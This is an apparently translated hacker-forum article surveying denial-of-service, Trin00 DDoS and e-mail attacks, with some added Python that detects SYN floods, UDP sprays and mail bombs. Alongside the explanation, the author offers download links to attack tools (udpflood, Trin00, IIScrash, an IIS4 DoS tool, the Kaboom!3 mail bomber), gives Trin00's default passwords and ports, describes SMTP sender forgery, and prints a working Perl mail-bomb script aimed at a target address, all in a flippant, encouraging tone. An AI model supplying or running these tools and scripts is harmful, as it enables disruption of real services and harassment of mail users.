Cold Road
█ Preamble
Among the many problems on the Internet, hackers and network security are perhaps the most pressing. This article is not mainly about the specific techniques of hacking and network security; instead it gives a formal description of the various attacks found on networks. The objects described fall into the following areas:
Denial-of-service attacks (Denial of Service), including distributed DDoS attacks
E-mail attacks, buffer overflow attacks, network sniffing attack techniques
IP spoofing attacks, scanners and password attacks, computer viruses
Trojan horses and PGP attacks, attacks enabled by routing and firewall technology, and so on
█ Denial-of-service attacks (Denial of Service)
Denial of service is one of the most detested of the newer attack types, because almost every machine on today's networks uses the TCP/IP protocol. This attack is mainly used against domain name servers, routers and other network services; after the attack the victim cannot run or work normally, and in serious cases the network can be paralysed for a time. A denial-of-service attack is one in which a user occupies a large amount of shared resources, leaving the system with no remaining resources to serve other users. The result of a denial-of-service attack is reduced availability of system resources; these resources can be CPU, CPU time, disk space, modem, printer, or even the system administrator's time, and the usual outcome is reduced or lost service.
Denial-of-service attacks target the core of the IP implementation, so they can appear on any platform. The denial-of-service attacks faced on UNIX systems can equally appear in the same form on Windows NT and other systems; the methods and principles are much the same. In most versions of UNIX the administrator can generally limit the maximum number of files a user may open or the number of processes a user may run, and some other versions of UNIX also allow a disk storage quota to be set for an individual account. Compared with other platforms, however, UNIX remains relatively old-fashioned in preventing denial-of-service attacks. There are many forms of denial-of-service attack: grounding the cable that connects the LAN, sending a flood of junk request packets to a domain name server so that it cannot complete resolution requests from other hosts, generating a large number of packets that occupy network bandwidth and slow the network's transfer rate so that normal service cannot be provided, and so on. The details of denial of service are explained below.
► Types of denial of service
Generally there are two types of denial of service. The first is an attempt to destroy a resource so that nobody can use it. The second is to overload some system service or consume some resource; this is sometimes caused deliberately by an attacker and sometimes by a system error, but either way other users are prevented from using the service (for example, filling up a disk partition so that users and system programs cannot create new files).
Most such cases are the result of user error or program error rather than a targeted attack. (For example, a classic case is a program bug where the recursion condition was meant to be x!=0 but was mistakenly written as x==0.)
► Several forms of denial-of-service attack on a network:
Packet flood: this kind of attack usually takes the form of one host on the Internet sending a large number of large packets to another machine in order to slow down that machine's processing and so disrupt its handling of legitimate service requests. Such packets are often login requests, file-service requests or a simple PWG. Whatever form they take, the mass of packets raises the load on the target machine's CPU, which consumes large amounts of resources responding to these junk requests. In serious cases the machine is left with no memory to buffer any other new requests, and it may crash with an error; it is common for servers to be attacked this way.
In 1998 an American, Victory, carried out one such attack against a server in Canada. He first wrote a program that could send nearly a thousand echo requests per second to the Canadian server's echo service, bombarding the NIS server so that for a period it could not respond to any request on the network at all. Meanwhile Victory logged in as a privileged user on a stepping-stone host, which asked the Canadian NIS server for NIS passwords; because the NIS server was under the echo-packet attack it could not respond, so the host Victory was using could pose as the server and answer the stepping-stone's request, sending it a message that the user password was wrong. Victory then used this time to write a program dedicated to answering the requests that should have been answered by the Canadian NIS server, and so easily obtained the user passwords and privileges on that host. The general defence against this kind of attack is a monitoring program combined with dividing the network into a number of small subnets; this prevents a good deal, but complete prevention is impossible.
SYN-Flooding attack: this attack is in fact what is known as IP spoofing. A SYN request is sent to the target machine from a forged address; sent in volume, these occupy enough of the target's resources to cause denial of service. The principle is that once the target receives such a request it allocates some resources to serve the new connection and replies with a SYN-ACK. Because that reply goes back to a forged address it receives no response, and the target keeps resending the reply until the "other side" reacts, which in fact it never will. Systems have a default retry count and timeout, and the resources are only released after a certain number of retries or after the timeout. In NT 3.5x and 4.0 the default is to retransmit the SYN-ACK reply 5 times, doubling the wait after each retransmission: the first wait is 3 seconds, and by the fifth retransmission the machine waits 48 seconds for a response; if there is still no response, the system waits a further 96 seconds before releasing the resources allocated to the connection, so 189 seconds have passed before these resources are freed.
Such an attack does not gain access to any system, but on most TCP/IP stacks the number of connections that can be in the SYN-RECEIVED state is very limited; when the port's limit is reached the target machine usually responds by resetting all further connection requests until the allocated resources are released. Normally you can use the netstat command to check your own connections and confirm whether you are under a SYN-Flood attack. The command is:
netstat -n -a tcp
If a large number of connections are in the SYN-RECEIVED state, you are under attack. You can get a feel for this by sending a message in OICQ while the network is down ^*^.
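As an added illustration (not code from the original article), the following Python reproduces the netstat check described above together with the NT retransmission arithmetic from the SYN-Flooding paragraph: it counts half-open connections per remote address in constructed `netstat -n -a` output (Linux and Windows column layouts), and works out how long each unanswered SYN holds its entry under the 3-second doubling schedule. All addresses, sample output and threshold values are assumptions of the example.

```python
"""Added example: SYN-flood check over netstat output and the SYN-ACK hold time.
Addresses, sample output and thresholds are constructed for this example."""
from collections import Counter

# Connection states that mean "SYN received, still waiting for the final ACK".
HALF_OPEN_STATES = {"SYN_RECV", "SYN_RECEIVED"}

# Constructed sample in the column layout of Linux `netstat -n -a`.
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 192.0.2.10:80           198.51.100.7:40001      SYN_RECV
tcp        0      0 192.0.2.10:80           198.51.100.7:40002      SYN_RECV
tcp        0      0 192.0.2.10:80           198.51.100.7:40003      SYN_RECV
tcp        0      0 192.0.2.10:80           198.51.100.7:40004      SYN_RECV
tcp        0      0 192.0.2.10:80           203.0.113.5:51234       ESTABLISHED
tcp        0      0 192.0.2.10:25           203.0.113.9:33010       SYN_RECV
tcp        0      0 192.0.2.10:22           203.0.113.11:22222      ESTABLISHED
"""

# Constructed sample in the layout of Windows `netstat -n -a` (no queue columns).
SAMPLE_NETSTAT_WIN = """\
  Proto  Local Address          Foreign Address        State
  TCP    192.0.2.10:80          198.51.100.7:40005     SYN_RECEIVED
  TCP    192.0.2.10:80          203.0.113.5:51235      ESTABLISHED
"""


def half_open_by_peer(netstat_text):
    """Return {remote_ip: number of connections in SYN_RECV/SYN_RECEIVED}.

    Linux prints "tcp Recv-Q Send-Q Local Foreign State" and Windows prints
    "TCP Local Foreign State"; in both layouts the state is the last column and
    the foreign address the column before it, so the parser relies on those.
    """
    counts = Counter()
    for line in netstat_text.splitlines():
        parts = line.split()
        if len(parts) < 4 or not parts[0].lower().startswith("tcp"):
            continue  # header, blank or non-TCP line
        if parts[-1] in HALF_OPEN_STATES:
            remote_ip = parts[-2].rsplit(":", 1)[0]  # strip the remote port
            counts[remote_ip] += 1
    return dict(counts)


def syn_flood_suspects(netstat_text, per_peer_threshold=3, total_threshold=10):
    """Flag a flood when one peer owns many half-open entries or the total is high.

    A spoofed flood usually spreads its SYN_RECV entries over random forged
    addresses, so the total matters as much as any single peer's count.
    """
    counts = half_open_by_peer(netstat_text)
    total = sum(counts.values())
    suspects = sorted(ip for ip, n in counts.items() if n >= per_peer_threshold)
    return {
        "total_half_open": total,
        "under_attack": total >= total_threshold or bool(suspects),
        "suspects": suspects,
    }


def syn_ack_hold_seconds(first_wait=3, retries=5, final_wait=96):
    """Seconds a half-open entry is held under the NT 3.5x/4.0 schedule quoted
    in the article: SYN-ACK retransmitted `retries` times with a doubling wait,
    then `final_wait` more seconds before release (3+6+12+24+48+96 = 189)."""
    return sum(first_wait * 2 ** i for i in range(retries)) + final_wait


def half_open_entries_needed(syn_rate_per_second, hold_seconds=None):
    """Half-open entries a steady stream of unanswered SYNs keeps occupied,
    i.e. the backlog size a defender must exceed for that rate not to fill it."""
    hold = syn_ack_hold_seconds() if hold_seconds is None else hold_seconds
    return syn_rate_per_second * hold
```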
"Paste" attack: the TCP/IP implementations of many UNIX systems have the potential for abuse, and so can be exploited by others using TCP half-open connections to consume system resources and cause denial of service. A TCP connection is established, and its parameters set, by a three-way handshake; I expect this is familiar to you, since it is common knowledge about the Internet. If many connection requests are sent to a target machine, each establishes a preliminary but incomplete connection, because not all the connection steps are completed; this is the so-called half-open connection, and when the target receives one it keeps it and ties up limited resources. Most of the time these connections use a forged source address, indicating that the connection came from a machine that does not exist or cannot be reached at all, so the connection cannot be traced; the only thing that can be done is to wait for it to time out and be released.
Service overload: when a large number of service requests are sent to a daemon on the target machine, the target is kept busy handling them and cannot handle its other routine tasks; some other connections will also be dropped because there is no capacity or space left to store them, and that is when service overload occurs. If the attack targets a TCP service, those requests will also be retransmitted, which burdens the network even further. Attacks like this are mostly driven by a wish to stay hidden, preventing the attacked machine from logging the attacker; such attacks can also block some other specific services the system provides. In addition, when the attacked service runs under inetd and is started with the nowait option, the default inetd has a "strangle" function built in: when the services it monitors receive too many requests in a short time it starts rejecting them and logs the erroneous service requests through syslog. Under these conditions the service process itself does not fail, and a record is left from which the root of the problem can be traced.
► Overload attacks: overload attacks include process overload, system overload, disk overload and so on.
Process overload is the simplest denial-of-service attack. Its effect is to deny the other users who are connected to the target machine at the same time as you, so it tends to show up on shared machines; if nobody is contending with you, it is pointless. Such attacks have little effect on today's UNIX systems, since current Unix limits the number of processes any UID (except 0) can use. This limit is called MAXUPROC; it is set in the kernel when the system is built, and some systems allow it to be set at boot time. Solaris, for example, allows the value to be set in the /etc/system file:
set MAXUPROC=100
On Unix systems you can clear out junk processes by sending the SIGTERM signal, with a command such as:
# kill -TERM -1
#
or (if your Unix does not support the above):
# kill -TERM 1
#
(Of course, you must have root privileges.) Unix will automatically kill some of the junk processes and drop into single-user mode, after which you can run sync and restart the system. If you do not have root in hand, you can use exec to run su, because this does not create a new process:
% exec /bin/su
password:
#
Note that you must not mistype the password or run exec ps directly, because once the program finishes you will automatically be logged out ^*^. If you are at the console, though, I would suggest just pressing RESET on the case; it may damage some files on disk, but it works. Haha.
System overload attack: a popular process-based attack in which one user spawns many processes that consume a lot of CPU time, reducing the CPU time available to other users. For instance, running a dozen or so find commands with grep to search for files in some directories can make the system very slow. Users are advised to use nice to lower the priority of background processes, or to use the at and batch commands to schedule long tasks for when the system is less busy. In a deliberate attack, of course, nobody will pay any attention to that. Then you have to log in as root, raise your own priority, look at the processes with ps and kill the junk ones, and you are done.
Systems on the network are actually very poor at resisting denial-of-service attacks; this year Yahoo, Amazon, CNN, eBay and other famous international sites were all paralysed by denial-of-service attacks. The tool used in those attacks has been circulating on the network since last year: udpflood.
You can get it from http://semxa.kstar.com/hacking/udpflood.exe; this is the version after my Chinese localisation. Its effect is not as powerful as legend has it; using udpflood on its own will not achieve any major result, unless you have the corresponding skill and attack in a targeted way.
Appendix: two destructive denial-of-service attacks and their countermeasures
** Reformatting a disk partition or running the newfs/mkfs command
Defence: prevent any user from accessing the machine in single-user mode, protect the system administrator's account, and protect disks that should be read-only.
** Deleting critical files, such as the files under /dev/ or the /etc/passwd file
Defence: protect system files with the correct mode bits (such as 755 or 711), protect root privileges, make NFS-exported files owned by root and export them read-only.
█ Distributed denial-of-service (DDoS) attacks
Around July 1999 a bug in Microsoft's Windows operating system was discovered and exploited in a number of attacks; this new form of attack was called the "distributed denial-of-service attack", i.e. "DDoS (Distributed Denial Of Service Attacks)". It is also a special form of denial-of-service attack: it uses many machines already under the attacker's control to attack a single machine, and against that much bandwidth the attacked host easily loses the ability to respond. It is now regarded as the most effective form of attack, and it is very hard to defend against. Using DDoS is not easy, however, and without considerable skill it is hard to pull off, because it requires the attacker to be familiar with intrusion techniques and to have enough time and brains. Now that hackers have written point-and-click tools to help, though, DDoS attacks have become relatively simple. The better-known such tools that can currently be found online include Trin00 and TFN. Installing and using these source packages is rather involved: you must first find vulnerabilities on the target machines, use some remote overflow exploit to gain control of them, and then install and run the DDoS distributed attack daemon on those machines.
Trin00 is somewhat like a Trojan. It consists of three parts: the client, the master, and the Broadcast (the distributed attack daemon). The client is a telnet program whose job is to send attack commands to the master. The master listens on two ports, 27655 and 31355. Port 27655 receives the commands sent by the client; executing them requires a password, and the default password may be "betaalmostdone". When the master starts it displays a prompt "?" and waits for the password (g0rave); after that, port 31355 begins waiting for UDP packets from the distributed daemons. As for the Broadcast (the distributed attack daemon), it is of course the part that carries out the attack. This end is installed on a machine already under your control; before the daemon is compiled, the real IP address of the master must first be planted in it. It communicates with the master by UDP, sending to the master's port 31355 a packet containing the bytes "*HELLO*"; the master sends information about the target machine to the Broadcast daemon through UDP port 27444, at which point the Broadcast daemon begins the attack. The flow of the attack is thus clearly:
attacking machine -> master -> Broadcast -> target machine
Everything the Broadcast daemon sends to the target is UDP packets, each containing 4 null bytes; these packets all come from one source port, but the destination ports on the target differ. For each packet the target must reply with an ICMP Port Unreachable message, and the flood of these UDP packets from many different hosts slows the target down further and further, until its bandwidth reaches 0.
You can get the Trin00 tool from http://semxa.kstar.com/hacking/Trin00.exe, but you will need to compile and port it yourself, otherwise it cannot be used.
The main effect of a DDoS attack is to consume the target's bandwidth, so it is hard to defend against, but there are many ways to detect it. An IDS can be used for defence and detection by analysing the UDP packets received, looking for packets aimed at many different local ports that all come from the same source address and the same source port. Alternatively, take ten or more UDP packets and check whether they come from the same address and the same port and differ only in the destination port; if so, you must pay attention. Another way is to look for ICMP Port Unreachable messages with the same source address and the same destination address. These methods allow the administrator to identify where an attack is coming from.
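As an added example (not part of the original article or of any Trin00 tool), here is the detection logic of the two paragraphs above run over constructed packet records: it flags a source address and source port that send ten or more UDP packets to different local ports (checking for the 4-byte payloads the daemon description mentions), and counts the ICMP Port Unreachable replies per source/destination pair. The record layout, addresses and thresholds are assumptions of the example.

```python
"""Added example: detect the Trin00-style UDP spray and the ICMP Port Unreachable
burst it provokes. Packet records, addresses and thresholds are constructed."""
from collections import defaultdict, namedtuple

# Minimal packet records (an assumption of this example, not a capture format).
Udp = namedtuple("Udp", "src sport dst dport length")
Icmp = namedtuple("Icmp", "src dst type code")

ICMP_DEST_UNREACH = 3  # ICMP type 3, Destination Unreachable
ICMP_PORT_UNREACH = 3  # code 3 of type 3, Port Unreachable

# Constructed sample traffic as seen by a sensor in front of 192.0.2.10.
SAMPLE_UDP = (
    # Flood: one source socket, 4-byte payloads, a different local port each time.
    [Udp("198.51.100.7", 40000, "192.0.2.10", 1000 + i, 4) for i in range(12)]
    # Ordinary DNS queries: the source port changes per query.
    + [Udp("203.0.113.5", 50000 + i, "192.0.2.10", 53, 40) for i in range(5)]
    # Syslog forwarding: fixed source socket, but always the same local port.
    + [Udp("203.0.113.9", 60000, "192.0.2.10", 514, 120) for _ in range(12)]
)
SAMPLE_ICMP = (
    # The victim answering every flood packet with Port Unreachable.
    [Icmp("192.0.2.10", "198.51.100.7", ICMP_DEST_UNREACH, ICMP_PORT_UNREACH)
     for _ in range(12)]
    # An unrelated Host Unreachable (type 3, code 1).
    + [Icmp("192.0.2.10", "203.0.113.9", ICMP_DEST_UNREACH, 1)]
)


def trin00_udp_sources(packets, min_packets=10):
    """Group UDP packets by (source address, source port, destination address).

    A group with at least `min_packets` packets spread over more than one
    destination port is the pattern the article describes: one fixed source
    socket spraying many local ports. Returns {key: summary} for such groups.
    """
    groups = defaultdict(list)
    for p in packets:
        groups[(p.src, p.sport, p.dst)].append(p)
    hits = {}
    for key, plist in groups.items():
        dports = {p.dport for p in plist}
        if len(plist) >= min_packets and len(dports) > 1:
            hits[key] = {
                "packets": len(plist),
                "ports": len(dports),
                # The article says each daemon packet carries 4 null bytes.
                "all_four_byte": all(p.length == 4 for p in plist),
            }
    return hits


def port_unreachable_bursts(msgs, min_msgs=10):
    """Count ICMP Port Unreachable replies per (source, destination) pair.

    The victim answering one flooded source shows up here, telling the
    administrator which host is under attack and from where. The replying
    host is genuine, but the address it replies to may itself be forged.
    """
    counts = defaultdict(int)
    for m in msgs:
        if m.type == ICMP_DEST_UNREACH and m.code == ICMP_PORT_UNREACH:
            counts[(m.src, m.dst)] += 1
    return {pair: n for pair, n in counts.items() if n >= min_msgs}
```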
You can also get the IIScrash program from http://semxa.kstar.com/hacking/iiscrash.zip; this program causes an IIS server to deny service, with the effect that several network services on the remote machine are disabled. Although it is not a major threat to network security, it does some harm to weakly defended IIS servers, so it is advisable to use it with care. You can also get from http://semxa.kstar.com/hacking/iis4dos01.exe the IIS4D.oS 0.1 attack tool for IIS4 written by the Chinese author Xiaorong (小榕), whose effect is to crash an IIS4 server; at present, though, the effect is not very obvious.
█ E-mail attacks
The e-mail bomb is an irritating attack. Traditional mail bombs mostly just throw a huge quantity of junk mail into a mailbox, filling it and consuming much of the system's free space and resources so that the machine temporarily cannot work normally. For dial-up users who collect mail by POP it also increases the time spent online, wasting money and time. Such tools can be found on the network at any time, and what is more worrying is that they are often used by people who have only just learned to use the Internet, because they are so simple. These tools also hide themselves well, protecting the address of the attacker. Excess junk mail increases the network load and consumes a lot of storage space; it also makes the system log files grow very large and can even overflow the filesystem, endangering Unix, Windows and other systems. Besides the possibility of a system crash, large volumes of junk mail consume a lot of CPU time and network bandwidth, making access speed a problem for normal users. For example, if nearly a hundred people simultaneously sent large quantities of junk mail to a large military site in some country, it is quite likely that the site's mail server would crash and the whole network might even be cut off.
Because e-mail is so widely deployed, it also exposes the network to serious security hazards; a malicious SYN-Flooding attack against port 25 (the default SMTP port), for instance, would be a dreadful thing. There are many kinds of e-mail attack, the main ones being:
Theft and tampering with data: by sniffing packets or intercepting information in transit, an attacker can read or modify data. This is done with a network sniffer; on Windows it can be done with NetXRay, and on UNIX and Linux with Tcpdump or Nfswatch (SGI Irix, HP-UX, SunOS). The well-known Sniffer comes in both hardware and software forms and is more professional still.
Forged mail: with a forged e-mail address, attacks can be carried out by deception.
Denial of service: flooding the system or network with junk mail so that it has no capacity left for anything else, paralysing the mail server or the network.
Viruses: today many viruses spread widely through e-mail; I love you is the most striking example of the new millennium.
► How e-mail is sent
To protect e-mail security it is necessary to understand how e-mail is sent. The process is as follows: after a user composes a message, the mail client first connects to the mail server; when the server responds, the mail tool is started and the routing program (mail routing, that is), Sendmail, is invoked to route the message. Based on the receiving host named in the recipient address attached to the message (for semxa@yeah.net, for example, yeah.net), it establishes a TCP connection to port 25 of the e-mail daemon on the host yeah.net; once established, both sides interact step by step according to the SMTP protocol and so complete delivery of the message. After the receiving side accepts the message, it is placed in the system's mail directory according to the recipient's user name, for example the file semxa in the /usr mail directory. The recipient likewise uses a mail tool to fetch and read the delivered messages. If delivery fails, the messages are returned to the sender. In reality the process of sending e-mail is more complex than described here and involves many configuration files. SMTP is a text-based protocol that is relatively simple to understand and implement; you can use telnet to connect directly to port 25 of a mail server (the port assigned to SMTP by IANA) and interact with it.
► E-mail spoofing:
At present the SMTP protocol badly lacks authentication, so impersonating a mailbox to send spoofed e-mail is not difficult, because the mail server makes no check of the sender's identity. If the mail server accepts connections to its SMTP port 25, anyone can connect to that port and send mail from a forged or non-existent user, and it is then very hard to find any genuine information about the sender; the only check available is to look at the system log file to find where the message was sent from, and in practice it is hard to find the person who forged the address. The text of an SMTP session goes like this: after using helo to identify itself, the sender should use the mail from and rcpt to commands to state the message's sender and recipient, then use the data command to enter the message body, with a line beginning with "." marking the end of the data, and finally use the quit command to end the SMTP session and close the connection to port 25. That way you can test for yourself where the secret of forgery lies. Of course, this should be tested for security purposes.
► Protecting your mailbox
The most effective way to protect the security of mailbox messages is to use cryptographic signature technology such as PGP to verify mail; verification assures that the message came from the right place and was not altered in transit. This is beyond what individual users can manage, though, because PGP is fairly complex.
As for e-mail bombs, protection can still be done quite well, since they are not very sophisticated; mostly they are just junk mail. You can get an E-mail Chomper from http://semxa.kstar.com/hacking/echom201.zip to protect yourself. For domestic users at present, however, most use free mailboxes such as yeah.net, 163.net and 263.net, and even if someone bombs them, the mail at worst stays on the mail server, so the harm is basically nil. If you collect mail by POP3, you can receive it with a POP client such as Outlook or Foxmail; most users use Windows' Outlook Express, where filtering can be set up under "Tools -> Inbox Assistant". For the Email worms that spread by e-mail, including unknown ones, you can get an Email virus immunisation module developed by the Skynet Security Lab from http://semxa.kstar.com/hacking/KiloveU.exe for protection.
Appendix: an example of a mail bomb written in Perl under UNIX
#!/bin/perl                       # directory where perl is installed
$mailprog='/user/lib/sendmail';   # directory where sendmail is installed
$recipient='xxx@xxx.com.jp';      # attack target
$variable_initialized_to_0=0;     # set the variable
while ($variable_initialized_to_0<1000){
open (MAIL,"|$mailprog $recipient") || die "Can't open $mailprog!\n";
print MAIL "YOU Sunk!";
close (MAIL);
sleep 3;
$variable_initialized_to_0++;     # increment by one
}
The code above initialises a variable variable_initialized_to_0 to 0 and then specifies that, as long as the variable is less than 1000, a message is sent to the target recipient. Each pass through the while loop adds 1 to variable_initialized_to_0, and the message is sent 999 times. I doubt any attacker would type in a large set of targets by hand; rather, they tend to use mailing lists, so when you see a website saying something like "Please leave your e-mail and we will notify you when we update", it is wise to be cautious.
If you only want it for research, you can get one of the most classic mail bombs, Kaboom!3, from http://semxa.kstar.com/hacking/Kaboom!3.zip.
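As an added defensive example (not from the original article), the following Python detects the burst pattern of a bomb like the script above in sendmail-style syslog lines: it counts messages per envelope sender inside a sliding time window and reports the relay they arrived from, which is the "look at the log file" step the spoofing section mentions. The log lines, host names, addresses and thresholds are constructed for the example, and the line format is an assumption modelled on sendmail's from= entries.

```python
"""Added example: find a mail-bomb burst in sendmail-style syslog lines by
counting messages per envelope sender inside a sliding time window.
Log lines, hosts, addresses and thresholds are constructed for this example."""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed lines in the shape of sendmail's "from=" syslog entries. The
# bomber delivers one message every 3 seconds, like the script in the article.
SAMPLE_LOG = "\n".join(
    [f"Jun 12 10:00:{3 * i:02d} mx sendmail[4242]: k5C{i:04d}: "
     f"from=<bomber@example.net>, size=9, class=0, nrcpts=1, proto=SMTP, "
     f"relay=[198.51.100.7]" for i in range(20)]
    + ["Jun 12 10:01:10 mx sendmail[4243]: k5Cz001: from=<alice@example.org>, "
       "size=2048, class=0, nrcpts=1, proto=ESMTP, relay=mail.example.org [203.0.113.5]",
       "Jun 12 10:05:00 mx sendmail[4244]: k5Cz002: from=<alice@example.org>, "
       "size=1024, class=0, nrcpts=1, proto=ESMTP, relay=mail.example.org [203.0.113.5]"]
)

FROM_LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sendmail\[\d+\]: (?P<qid>\S+): "
    r"from=<(?P<sender>[^>]*)>.*relay=(?P<relay>\S+(?: \[[^\]]+\])?)"
)


def parse_from_lines(log_text):
    """Yield (timestamp, envelope sender, relay) for each matching line.

    Syslog timestamps carry no year, so every entry is parsed into the same
    dummy year; that is fine for a window measured in seconds.
    """
    for line in log_text.splitlines():
        m = FROM_LINE.match(line)
        if not m:
            continue  # not a from= line (queue, stat, etc.)
        ts = datetime.strptime(" ".join(m["ts"].split()), "%b %d %H:%M:%S")
        yield ts, m["sender"], m["relay"]


def mail_bomb_senders(log_text, max_msgs=10, window_seconds=60):
    """Return {sender: {"peak": n, "relay": r}} for every envelope sender that
    has more than `max_msgs` messages accepted within any `window_seconds`.
    Lines are assumed to be in chronological order, as syslog writes them."""
    recent = defaultdict(deque)
    flagged = {}
    for ts, sender, relay in parse_from_lines(log_text):
        window = recent[sender]
        window.append(ts)
        while (ts - window[0]).total_seconds() > window_seconds:
            window.popleft()  # drop entries older than the window
        if len(window) > max_msgs:
            info = flagged.setdefault(sender, {"peak": 0, "relay": relay})
            info["peak"] = max(info["peak"], len(window))
    return flagged
```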